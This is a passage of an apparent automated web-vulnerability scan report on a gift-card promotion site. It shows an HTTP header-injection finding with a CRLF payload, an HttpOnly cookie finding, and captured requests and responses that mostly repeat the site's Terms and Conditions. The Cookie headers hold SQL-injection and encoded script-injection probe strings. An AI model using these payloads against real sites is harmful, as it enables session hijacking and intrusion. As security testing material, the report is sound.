You must complete the required number of Sponsor Offers within 60 days following the Program Sign-up Date, and all the steps in the Program Requirements (including the mailing-in of your Gift Redemption Voucher) must be completed within 180 days of your Program Sign-up Date. To remain eligible and qualify for program offers, you must use the same personal contact information that you provided during registration when making purchases.</p>
<p>
The number and category of Sponsor Offers available for you changes on a periodic basis as new Sponsors come in to the Site and older Sponsors expire. You should check back periodically after the Program Sign-up Date for new Sponsor Offer opportunities by visiting your &ldquo;Gift Status&rdquo; section under your &ldquo;Member Account&rdquo;.</p>
<p>
We rely on each Sponsor to provide us with timely reporting and confirmation of your successful completion of their Sponsor Offer. Sponsor offers may take 4 to 6 weeks to confirm successful completions. You must save all receipts, order confirmation, records and materials that show your transaction history with each Sponsor Offer. You may be asked for copies of receipts, order confirmations and other relevant documents in the Gift Redemption process to verify your transactions with Sponsors and failure to produce the required documents for a Sponsor Offer when requested may result in you not receiving completion credit for that Sponsor Offer. In addition, we reserve the right to request proof of identity such as a copy of your driver�s license, passport or other government issued identification.</p>

<p><strong>CANCELLATION LIMITATION: </strong>You will not be eligible to receive a Gift in this Promotion if, within 30 days of your Sponsor Offer Initial Transaction Date, you cancel your participation in more than two Sponsor Offers you have completed as a part of the Program Requirements. If you were invited by a Refer-a-Friend Offer, you can't cancel your participation in any Sponsor Offers within 30 days of your Sponsor Offer Initial Transaction Date (the &ldquo;<strong>Cancellation Limitation</strong>&rdquo;). </p>

<!--header:start-->
<!--header:end-->
<li><strong><u>Refer-a-Friend </u></strong><strong><u>Offers</u></strong> � If presented with Refer-a-Friend offers, you may choose to invite friend(s) who must complete the required number of Sponsor Offers as stated in the Refer-a-Friend email sent to your friend(s) which in turn will generate a Sponsor Offer completion towards your Gift. Refer-a-Friend Offers may require multiple friends to complete the required number of Sponsor Offers in order to generate a Sponsor Offer completion as stated on the Silver, Gold, and Platinum Refer-a-Friend Offer pages.
<p>Friends you refer must register using the link provided in the Refer-a-Friend email delivered to them. Please note the Refer-a-Friend email sent to friends must comply with <u>the CAN SPAM ACT of 2003</u>. Your friend�s name, address and email address must be different than yours, although your friend(s) may use an email address that is not the same as that initially provided by you.</p>
<p>Qualified Friends must: a.) abide by these Terms and Conditions when registering on this site; b.) register with a valid residential address; c.) have only been invited once by you from either the Silver, Gold, or Platinum Sponsor Offer pages; d.) not have previously generated Refer-a-Friend Offer completions for a friend on this web site; e.) satisfy the required number of Sponsor Offers, as shown on the Refer-a-Friend Offer pages and in the Refer-A-Friend email sent to your friend(s), within sixty (60) days of your registration date; and f.) not cancel participation in Sponsor Offers within 30 days of Friend(s) Sponsor Offer Initial Transaction Date(s). </p>
</li>
<li><strong><u>Gift Redemption</u></strong>- Check the �Gift Status� section of your Member Account information on the Site on a regular basis so that you�ll be able to see your progress as various Sponsors report back to us with your completion status. Before you receive a Gift Redemption Voucher the following must occur: a.) the required number of Sponsors must have reported to us that you successfully completed their offers, and b.) you have provided the required proofs of purchase. Upon satisfying a.) and b.) your account will be updated accordingly and you will receive a Gift Redemption Voucher to print, complete and mail for your Gift. Once you have sent your Gift Redemption Voucher, the Gift Status section of your Member Account will be updated. Be sure to keep a copy of your Gift Redemption Voucher. Upon our receipt of your properly completed Gift Redemption Voucher, it will take six (6) to eight (8) weeks to ship your Gift.
<p>
<strong>Note:</strong> We are solely responsible for the fulfillment of your Gift. All questions related to Gift fulfillment should be directed to us. Please do not contact our Sponsors regarding your Gift fulfillment status. The Sponsors are solely responsible for their Offers, Program Requirements, refunds, products, cancellations and related customer service. For those questions, please contact the Sponsors directly.</p>
</li>
<li><strong><u>License to Use this Site and Become a Member</u></strong>- Upon your agreement to this Agreement, the Company hereby grants you a non-exclusive, non-transferable limited license to use this site and participate in our programs in strict accordance with the terms and conditions in this Agreement and as permitted via instructions on this site. You acknowledge and agree that all content and services available on this site are property of the Company and its advertisers and licensors and are protected by copyrights, moral rights, trademarks, service marks, patents, trade secrets, and other proprietary rights and laws, in the U.S. and internationally. All rights not expressly granted herein are fully reserved by the Company, its advertisers and licensors.</li></ol>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">5. TERMINATION/CANCELLATION OF ACCOUNTS</font></b></p>
<!--header:end-->

<p>Company may, at its sole discretion, terminate any account and deny any Gift without prior notice for:</p>
<ul>
<li>any violation of any provision of these Terms and Conditions or fraudulent activity;</li>
<li>aiding, promoting, or participating in circumvention of the Program, including, but not limited to, using any account to accrue a Gift for a third party or using a third party's account to accrue a Gift for yourself, including without limitation posting information on a website, forum, or auction that has to do with "canceling the offers" or cancellation phone numbers, cancellation time frames, and any encouragement or direction to cancel Sponsor Offers; </li>
<li>using multiple email addresses to circumvent th..
- /info.htm

/info.htm

http://your-gift-zone.com/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=http://example.c..

Parameters

Parameter Type Value
tp GET tos
promo_name GET 2192name
catalog_id GET 13200
gift GET http://example.com/? ns: netsparker056650=vuln

Request

GET /info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==; 0)>0)=; 0)<255)=; 0)>25)=; 2))=; 1))>0=; 1))<255=; 1))>255=; 1))>25=
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:15:23 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db8330b109bdxc1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,gift_cookie=http://example.com/?
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
ns: netsparker056650=vuln;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
Connection: close
Content-Type: text/html










<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Your-gift-zone</title>
<link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/global-cust-service.css" />
<link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/giftstatus-content.css" />
<!--[if IE 6]><link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/IE6fix.css"><![endif]-->




<style type="text/css">
#emailaddr {
margin-top:30px;
float:left;
width:355px;
padding-bottom:70px;
}
#offer {
float:left;
width:228px;
height:209px;
margin-left:0px;
}
</style>


</head>
<body>

<div id="frame">
<div id="header">
<div id="navbar">
<div class="hovermenu">
<ul>
<li><a href="http://your-gift-zone.com/info.htm?tp=faq&user_gift_id=&promo_name=2192name&gift=71&catalog_id=13200" target="_self">HELP</a></li>
<li><a href="http://your-gift-zone.com/redeem.htm?user_gift_id=&promo_name=2192name&gift=71&catalog_id=13200" target="_self">GIFT STATUS</a></li>
<li><a href="http://your-gift-zone.com/testimonials.htm?user_gift_id=&promo_name=2192name&gift=71&catalog_id=13200&wrap=0" target="_self">TESTIMONIALS</a></li>
<li><a href="http://your-gift-zone.com/info.htm?tp=con&user_gift_id=&promo_name=2192name&gift=71&catalog_id=13200" target="_self">&nbsp;&nbsp;CONTACT US&nbsp;&nbsp;&nbsp;</a></li>
</ul>
</div>
</div>
<div id="mainhdr">Your-gift-zone</div>
<div id="pagehdr">Terms &amp; Conditions</div>
</div>

<div id="content" class="clearfix">
<div id="girlbody"><img src="http://i.pcp001.com/media/cs/girlbody.jpg" width="158" height="299"></div>
<div id="girlfingers"><img src="http://i.pcp001.com/media/cs/girl-fingers.jpg" width="343" height="54"></div>
<div id="mainarea">
<!--header:start-->
<p class="headline_txt"><b><font size="+1">Effective Date: July 29, 2010.</font></b></p>
<!--header:end-->

<p>Welcome to the Your-gift-zone Web site (hereinafter the &ldquo;<strong>Site</strong>&rdquo;), operated by Reliant (&ldquo;<strong>Company</strong>&rdquo;). The following terms and conditions, the Privacy Policy and any other policies, notices, rules or guidelines posted on the Site shall govern your use of the Site and your participation in the Program. Because this terms and conditions document (the &ldquo;<strong>Terms and Conditions</strong>&rdquo;) constitutes a legal agreement between you and the Company, please read them carefully. Capitalized terms not defined in the text are defined in the section entitled &ldquo;Definitions&rdquo; at the end of these Terms and Conditions.</p>

<!--header:start-->
<p class="headline_txt"><b><font size="+1">1. YOUR AGREEMENT</font></b></p>
<!--header:end-->

<p>By using this Site, you agree to be bound by, and to comply with, these Terms and Conditions. You also agree to comply with any guidelines or rules posted on the Site, and all such guidelines and rules are hereby incorporated by reference into these Terms and Conditions. If you are dissatisfied with this Site, its content or the Terms and Conditions, you agree that your sole and exclusive remedy is to discontinue using this Site and to cancel your participation in the Program.</p>

<p><strong><em>PLEASE NOTE:</em></strong> We reserve the right, in our sole discretion, to change, modify or otherwise alter these Terms and Conditions at any time. Unless otherwise indicated, amendments will become effective on the earlier of (i) the date such amendment was posted to the Site, or (ii) at the earliest date permitted under applicable law (the &ldquo;<strong>Effective Date</strong>&rdquo;). Please review these Terms and Conditions regularly. Your continued use of the Site or the Program following the Effective Date of any amendment will constitute your acceptance of the amended Terms and Conditions. For your information, this page was last updated as of the date set forth at the top of these Terms and Conditions.</p>

<!--header:start-->
<p class="headline_txt"><b><font size="+1">2. PRIVACY</font></b></p>
<!--header:end-->

<p>
Please review our <a href="/info.htm?tp=privacy&user_gift_id=&promo_name=2192name&gift=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200" target="_self">Privacy Policy</a>, which also governs your visit to this Site, to understand our practices relating to the collection and use of personal information.
</p>

<p><strong><em>Express Consent:</em></strong> By accepting the terms and conditions of this Site and providing your telephone number, you are subscribing to a service that transmits special offers to subscribers via pre-recorded voice messages.
</p><p>
By subscribing, you are expressly consenting to receive pre-recorded telephone messages from The Firebrand Group, LLC, a Nevada company doing business as Worldwide Commerce Associates (�WCA�) that include special or discounted sales offers. You are subscribing to receive offers only from WCA, and only at the specific numbers(s) you have provided to us. Your consent will be effective regardless of whether the number you have provided: (a) is a home, business, or cell phone line; and/or (b) is or will be registered on any state or federal Do-Not-Call (DNC) list, and shall remain in effect until you revoke your consent and cancel your subscription.
</p><p>
To unsubscribe: You may cancel your subscription and revoke your consent to receive pre-recorded telephone calls at any time by either (a) utilizing the opt-out procedure included in any message you receive; or (b) by calling 800-269-0281
</p><p>
NOTE: WCA does not send offers via email, and is unable to honor any unsubscribe requests sent by other companies. If you are receiving offers via email please follow the unsubscribe instructions included therein.
</p>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">3. ELIGIBILITY FOR PARTICIPATION</font></b></p>
<!--header:end-->

To be eligible to participate in the Program, you must be at least 18 years of age at the time of registration and reside in the United States. Employees of the Company and persons related to or residing in the same household of such employees are not eligible to become Members. Corporations or other business entities are not eligible to participate. <u>Only one gift is permitted from Reliant per person and/or household for one year after your registration date. </u>


<p><strong>B. To be eligible to receive a Gift or assist a friend in receiving a Gift through a Refer-a-Friend offer, you must: (i) establish and maintain an account on the Site registered to a valid, unique e-mail address belonging only to the individual identified in the registration information; (ii) provide valid and truthful information as requested by the Company or a participating Sponsor, including your full legal name, postal address of your principal residence, land line or mobile telephone number and valid email address; (iii) agree to receive solicitations, marketing materials and other communications from us and Sponsors via e-mail, telemarketing, direct marketing, mobile marketing and any other method; (iv) have cookies enabled; (v) provide the address of your principal residence as a shipping address; and (vi) comply with each of the provisions of these Terms and Conditions.</strong></p>
<a name="prog_req"></a>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">4. PROGRAM REQUIREMENTS / RULES OF PARTICIPATION </font></b></p>
<!--header:end-->

<p>To qualify for your Gift or assist a friend in qualifying for a Gift through a Refer-a-Friend offer (as defined below) in this Program, you must complete the following steps and your account must not have been terminated pursuant to Section 5:</p>

<!--header:start-->
<ol type="A">
<li><u><strong>Registration</strong></u><br />
Access the registration form on the Site and enter and submit all requested information. Do not enter a P.O. Box for your mailing address. We will not ship any promotional item to a P.O. Box. You also may be offered the opportunity to answer a series of survey questions about your interests and/or request more information from our marketing partners. </li>
<br /><br />
<li><u><strong>Complete Sponsor Offers (and comply with the Cancellation Limitation)</strong></u><br />
For this promotion, $50 Gift Card, you must complete a <i>total</i> of 24 offers as follows: <b>Page 1 (Silver) - complete any 8 offers; Page 2 (Gold) - complete any 8 offers; Page 3 (Platinum) - complete any 8 offers to get your gift.</b></p>


<p>To &ldquo;complete&rdquo; each Sponsor Offer, you must complete the exact number of Sponsor Offer Requirements as indicated on the Site, the Sponsor must report to us that you have successfully completed their offer (Sponsor notification typically takes 4 weeks), and you must not exceed the Cancellation Limitation set forth below.</p>
<p>
Examples of Sponsor Offers include, without limitation, trial offers, credit cards, product offers, service offers, other low-cost or commercial Offers, and Refer-a-Friend Offers. Some Offers require a purchase to be made, while others are free trials that convert to paying obligations if not canceled or free applications that do not require an initial purchase.</p>
<p>
You must complete the required number of Sponsor Offers within 60 days following the Program Sign-up Date, and all the steps in the Program Requirements (including the mailing-in of your Gift Redemption Voucher) must be completed within 180 days of your Program Sign-up Date. To remain eligible and qualify for program offers, you must use the same personal contact information that you provided during registration when making purchases.</p>
<p>
The number and category of Sponsor Offers available for you changes on a periodic basis as new Sponsors come in to the Site and older Sponsors expire. You should check back periodically after the Program Sign-up Date for new Sponsor Offer opportunities by visiting your &ldquo;Gift Status&rdquo; section under your &ldquo;Member Account&rdquo;.</p>
<p>
We rely on each Sponsor to provide us with timely reporting and confirmation of your successful completion of their Sponsor Offer. Sponsor offers may take 4 to 6 weeks to confirm successful completions. You must save all receipts, order confirmation, records and materials that show your transaction history with each Sponsor Offer. You may be asked for copies of receipts, order confirmations and other relevant documents in the Gift Redemption process to verify your transactions with Sponsors and failure to produce the required documents for a Sponsor Offer when requested may result in you not receiving completion credit for that Sponsor Offer. In addition, we reserve the right to request proof of identity such as a copy of your driver�s license, passport or other government issued identification.</p>

<p><strong>CANCELLATION LIMITATION: </strong>You will not be eligible to receive a Gift in this Promotion if, within 30 days of your Sponsor Offer Initial Transaction Date, you cancel your participation in more than two Sponsor Offers you have completed as a part of the Program Requirements. If you were invited by a Refer-a-Friend Offer, you can't cancel your participation in any Sponsor Offers within 30 days of your Sponsor Offer Initial Transaction Date (the &ldquo;<strong>Cancellation Limitation</strong>&rdquo;). </p>

<!--header:start-->
<!--header:end-->
<li><strong><u>Refer-a-Friend </u></strong><strong><u>Offers</u></strong> � If presented with Refer-a-Friend offers, you may choose to invite friend(s) who must complete the required number of Sponsor Offers as stated in the Refer-a-Friend email sent to your friend(s) which in turn will generate a Sponsor Offer completion towards your Gift. Refer-a-Friend Offers may require multiple friends to complete the required number of Sponsor Offers in order to generate a Sponsor Offer completion as stated on the Silver, Gold, and Platinum Refer-a-Friend Offer pages.
<p>Friends you refer must register using the link provided in the Refer-a-Friend email delivered to them. Please note the Refer-a-Friend email sent to friends must comply with <u>the CAN SPAM ACT of 2003</u>. Your friend�s name, address and email address must be different than yours, although your friend(s) may use an email address that is not the same as that initially provided by you.</p>
<p>Qualified Friends must: a.) abide by these Terms and Conditions when registering on this site; b.) register with a valid residential address; c.) have only been invited once by you from either the Silver, Gold, or Platinum Sponsor Offer pages; d.) not have previously generated Refer-a-Friend Offer completions for a friend on this web site; e.) satisfy the required number of Sponsor Offers, as shown on the Refer-a-Friend Offer pages and in the Refer-A-Friend email sent to your friend(s), within sixty (60) days of your registration date; and f.) not cancel participation in Sponsor Offers within 30 days of Friend(s) Sponsor Offer Initial Transaction Date(s). </p>
</li>
<li><strong><u>Gift Redemption</u></strong>- Check the �Gift Status� section of your Member Account information on the Site on a regular basis so that you�ll be able to see your progress as various Sponsors report back to us with your completion status. Before you receive a Gift Redemption Voucher the following must occur: a.) the required number of Sponsors must have reported to us that you successfully completed their offers, and b.) you have provided the required proofs of purchase. Upon satisfying a.) and b.) your account will be updated accordingly and you will receive a Gift Redemption Voucher to print, complete and mail for your Gift. Once you have sent your Gift Redemption Voucher, the Gift Status section of your Member Account will be updated. Be sure to keep a copy of your Gift Redemption Voucher. Upon our receipt of your properly completed Gift Redemption Voucher, it will take six (6) to eight (8) weeks to ship your Gift.
<p>
<strong>Note:</strong> We are solely responsible for the fulfillment of your Gift. All questions related to Gift fulfillment should be directed to us. Please do not contact our Sponsors regarding your Gift fulfillment status. The Sponsors are solely responsible for their Offers, Program Requirements, refunds, products, cancellations and related customer service. For those questions, please contact the Sponsors directly.</p>
</li>
<li><strong><u>License to Use this Site and Become a Member</u></strong>- Upon your agreement to this Agreement, the Company hereby grants you a non-exclusive, non-transferable limited license to use this site and participate in our programs in strict accordance with the terms and conditions in this Agreement and as permitted via instructions on this site. You acknowledge and agree that all content and services available on this site are property of the Company and its advertisers and licensors and are protected by copyrights, moral rights, trademarks, service marks, patents, trade secrets, and other proprietary rights and laws, in the U.S. and internationally. All rights not expressly granted herein are fully reserved by the Company, its advertisers and licensors.</li></ol>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">5. TERMINATION/CANCELLATION OF ACCOUNTS</font></b></p>
<!--header:end-->

<p>Company may, at its sole discretion, terminate any account and deny any Gift without prior notice for:</p>
<ul>
<li>any violation of any provision of these Terms and Conditions or fraudulent activity;</li>
<li>aiding, promoting, or participating in circumvention of the Program, including, but not limited to, using any account to accrue a Gift for a third party or using a third party's account to accrue a Gift for yourself, including without limitation posting information on a website, forum, or auction that has to do with "canceling the offers" or cancellation phone numbers, cancellation time frames, and any encouragement or direction to cancel Sponsor Offers; </li>
<li>using multiple email addresses to circumvent the Program</li>
<li>signing up for and immediately cancelling multiple offers</li>
<li>purchasing referrals or paying third party�s to complete Sponsor Offers;</li>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /info.htm

/info.htm CONFIRMED

http://your-gift-zone.com/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7c..

Identified Cookie

gift_cookie

Request

GET /info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: promo_name_cookie=2192name; c_user_pin_id=200492244; c_pin_key=706853; c_email_key=063756462f49f8c46ec5bc4e60bb02b1
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:53:14 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82dda41e640vw;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,gift_cookie=29617;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<link rel="stylesheet" type="text/css" href="http://i.pcp001.com/t/10142/customer_service_vsib.css" />
<link rel="stylesheet" type="text/css" href="http://i.pcp001.com/t/10142/giftstatus_vsib3.css" />
<!--[if IE 6]><link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/IE6fix.css"><![endif]-->

<style type="text/css">
#emailaddr {
margin-top:30px;
float:left;
width:355px;
padding-bottom:70px;
}
#offer {
float:left;
width:228px;
height:209px;
margin-left:0px;
}
</style>


</head>
<body>

<!--header:start-->
<p class="headline_txt"><b><font size="+1">Effective Date: July 29, 2010.</font></b></p>
<!--header:end-->

<p>Welcome to the Your-gift-zone Web site (hereinafter the &ldquo;<strong>Site</strong>&rdquo;), operated by Reliant (&ldquo;<strong>Company</strong>&rdquo;). The following terms and conditions, the Privacy Policy and any other policies, notices, rules or guidelines posted on the Site shall govern your use of the Site and your participation in the Program. Because this terms and conditions document (the &ldquo;<strong>Terms and Conditions</strong>&rdquo;) constitutes a legal agreement between you and the Company, please read them carefully. Capitalized terms not defined in the text are defined in the section entitled &ldquo;Definitions&rdquo; at the end of these Terms and Conditions.</p>

<!--header:start-->
<p class="headline_txt"><b><font size="+1">1. YOUR AGREEMENT</font></b></p>
<!--header:end-->

<p>By using this Site, you agree to be bound by, and to comply with, these Terms and Conditions. You also agree to comply with any guidelines or rules posted on the Site, and all such guidelines and rules are hereby incorporated by reference into these Terms and Conditions. If you are dissatisfied with this Site, its content or the Terms and Conditions, you agree that your sole and exclusive remedy is to discontinue using this Site and to cancel your participation in the Program.</p>

<p><strong><em>PLEASE NOTE:</em></strong> We reserve the right, in our sole discretion, to change, modify or otherwise alter these Terms and Conditions at any time. Unless otherwise indicated, amendments will become effective on the earlier of (i) the date such amendment was posted to the Site, or (ii) at the earliest date permitted under applicable law (the &ldquo;<strong>Effective Date</strong>&rdquo;). Please review these Terms and Conditions regularly. Your continued use of the Site or the Program following the Effective Date of any amendment will constitute your acceptance of the amended Terms and Conditions. For your information, this page was last updated as of the date set forth at the top of these Terms and Conditions.</p>

<!--header:start-->
<p class="headline_txt"><b><font size="+1">2. PRIVACY</font></b></p>
<!--header:end-->

<p>
Please review our <a href="/info.htm?tp=privacy&user_gift_id=&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265" target="_self">Privacy Policy</a>, which also governs your visit to this Site, to understand our practices relating to the collection and use of personal information.
</p>

<p><strong><em>Express Consent:</em></strong> By accepting the terms and conditions of this Site and providing your telephone number, you are subscribing to a service that transmits special offers to subscribers via pre-recorded voice messages.
</p><p>
By subscribing, you are expressly consenting to receive pre-recorded telephone messages from The Firebrand Group, LLC, a Nevada company doing business as Worldwide Commerce Associates (�WCA�) that include special or discounted sales offers. You are subscribing to receive offers only from WCA, and only at the specific numbers(s) you have provided to us. Your consent will be effective regardless of whether the number you have provided: (a) is a home, business, or cell phone line; and/or (b) is or will be registered on any state or federal Do-Not-Call (DNC) list, and shall remain in effect until you revoke your consent and cancel your subscription.
</p><p>
To unsubscribe: You may cancel your subscription and revoke your consent to receive pre-recorded telephone calls at any time by either (a) utilizing the opt-out procedure included in any message you receive; or (b) by calling 800-269-0281
</p><p>
NOTE: WCA does not send offers via email, and is unable to honor any unsubscribe requests sent by other companies. If you are receiving offers via email please follow the unsubscribe instructions included therein.
</p>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">3. ELIGIBILITY FOR PARTICIPATION</font></b></p>
<!--header:end-->

To be eligible to participate in the Program, you must be at least 18 years of age at the time of registration and reside in the United States. Employees of the Company and persons related to or residing in the same household of such employees are not eligible to become Members. Corporations or other business entities are not eligible to participate. <u>Only one gift is permitted from Reliant per person and/or household for one year after your registration date. </u>


<p><strong>B. To be eligible to receive a Gift or assist a friend in receiving a Gift through a Refer-a-Friend offer, you must: (i) establish and maintain an account on the Site registered to a valid, unique e-mail address belonging only to the individual identified in the registration information; (ii) provide valid and truthful information as requested by the Company or a participating Sponsor, including your full legal name, postal address of your principal residence, land line or mobile telephone number and valid email address; (iii) agree to receive solicitations, marketing materials and other communications from us and Sponsors via e-mail, telemarketing, direct marketing, mobile marketing and any other method; (iv) have cookies enabled; (v) provide the address of your principal residence as a shipping address; and (vi) comply with each of the provisions of these Terms and Conditions.</strong></p>
<a name="prog_req"></a>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">4. PROGRAM REQUIREMENTS / RULES OF PARTICIPATION </font></b></p>
<!--header:end-->

<p>To qualify for your Gift or assist a friend in qualifying for a Gift through a Refer-a-Friend offer (as defined below) in this Program, you must complete the following steps and your account must not have been terminated pursuant to Section 5:</p>

<!--header:start-->
<ol type="A">
<li><u><strong>Registration</strong></u><br />
Access the registration form on the Site and enter and submit all requested information. Do not enter a P.O. Box for your mailing address. We will not ship any promotional item to a P.O. Box. You also may be offered the opportunity to answer a series of survey questions about your interests and/or request more information from our marketing partners. </li>
<br /><br />
<li><u><strong>Complete Sponsor Offers (and comply with the Cancellation Limitation)</strong></u><br />
For this promotion, $250 in McDonald's Arch Cards, you must complete a <i>total</i> of 6 offers as follows: <b>Page 1 (Silver) - complete any 2 offers; Page 2 (Gold) - complete any 2 offers; Page 3 (Platinum) - complete any 2 offers to get your gift.</b></p>


<p>To &ldquo;complete&rdquo; each Sponsor Offer, you must complete the exact number of Sponsor Offer Requirements as indicated on the Site, the Sponsor must report to us that you have successfully completed their offer (Sponsor notification typically takes 4 weeks), and you must not exceed the Cancellation Limitation set forth below.</p>
<p>
Examples of Sponsor Offers include, without limitation, trial offers, credit cards, product offers, service offers, other low-cost or commercial Offers, and Refer-a-Friend Offers. Some Offers require a purchase to be made, while others are free trials that convert to paying obligations if not canceled or free applications that do not require an initial purchase.</p>
<p>
You must complete the required number of Sponsor Offers within 60 days following the Program Sign-up Date, and all the steps in the Program Requirements (including the mailing-in of your Gift Redemption Voucher) must be completed within 180 days of your Program Sign-up Date. To remain eligible and qualify for program offers, you must use the same personal contact information that you provided during registration when making purchases.</p>
<p>
The number and category of Sponsor Offers available for you changes on a periodic basis as new Sponsors come in to the Site and older Sponsors expire. You should check back periodically after the Program Sign-up Date for new Sponsor Offer opportunities by visiting your &ldquo;Gift Status&rdquo; section under your &ldquo;Member Account&rdquo;.</p>
<p>
We rely on each Sponsor to provide us with timely reporting and confirmation of your successful completion of their Sponsor Offer. Sponsor offers may take 4 to 6 weeks to confirm successful completions. You must save all receipts, order confirmation, records and materials that show your transaction history with each Sponsor Offer. You may be asked for copies of receipts, order confirmations and other relevant documents in the Gift Redemption process to verify your transactions with Sponsors and failure to produce the required documents for a Sponsor Offer when requested may result in you not receiving completion credit for that Sponsor Offer. In addition, we reserve the right to request proof of identity such as a copy of your driver�s license, passport or other government issued identification.</p>

<p><strong>CANCELLATION LIMITATION: </strong>You will not be eligible to receive a Gift in this Promotion if, within 30 days of your Sponsor Offer Initial Transaction Date, you cancel your participation in more than two Sponsor Offers you have completed as a part of the Program Requirements. If you were invited by a Refer-a-Friend Offer, you can't cancel your participation in any Sponsor Offers within 30 days of your Sponsor Offer Initial Transaction Date (the &ldquo;<strong>Cancellation Limitation</strong>&rdquo;). </p>

<!--header:start-->
<!--header:end-->
<li><strong><u>Refer-a-Friend </u></strong><strong><u>Offers</u></strong> � If presented with Refer-a-Friend offers, you may choose to invite friend(s) who must complete the required number of Sponsor Offers as stated in the Refer-a-Friend email sent to your friend(s) which in turn will generate a Sponsor Offer completion towards your Gift. Refer-a-Friend Offers may require multiple friends to complete the required number of Sponsor Offers in order to generate a Sponsor Offer completion as stated on the Silver, Gold, and Platinum Refer-a-Friend Offer pages.
<p>Friends you refer must register using the link provided in the Refer-a-Friend email delivered to them. Please note the Refer-a-Friend email sent to friends must comply with <u>the CAN SPAM ACT of 2003</u>. Your friend�s name, address and email address must be different than yours, although your friend(s) may use an email address that is not the same as that initially provided by you.</p>
